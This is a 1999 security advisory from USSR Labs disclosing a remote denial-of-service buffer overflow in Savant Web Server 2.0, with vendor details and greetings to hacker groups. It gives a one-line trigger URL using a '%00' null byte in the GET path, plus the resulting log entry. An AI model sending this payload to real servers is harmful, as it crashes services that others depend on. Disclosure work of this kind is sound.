Local / Remote D.o.S Attack in Savant Web Server V2.0 WIN9X / NT / 2K USSR Advisory Code: USSR-99026 Release Date: December 28, 1999 [2/5] Systems Affected: Savant Web Server V2.0 Win9X / NT / 2K and possibly others versions. About The Software: Savant provides support for most modern web features and technologies, including: Common Gateway Interface (CGI) 1.0 and 1.1 HTTP 0.9, 1.0, and 1.1 including keep-alive ability Comprehensive logging in the standard NCSA format User and group management Password protection Server-side image maps Support for over 40 file types, including MP3, RealAudio, and Microsoft Office files XML, JavaScript, Java, and ActiveX, and more! THE PROBLEM UssrLabs found a Local / Remote Buffer overflow,the buffer overflow is caused by a NULL Character in the parsing Get Command rutine. Example: in Internet Explorer, address: Htpp://SavantServerIP/%00/ The D.O.S action is logged in, C:\Savant\Logs\general.txt, inside looks like this one Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex. htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279 Do you do the w00w00? This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html Vendor Status: Informed. Vendor Url: http://hera.wku.edu/~lamonml/savant/index.html Program Url: http://hera.wku.edu/~lamonml/savant/download.html Credit: USSRLABS SOLUTION Noting yet :( Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com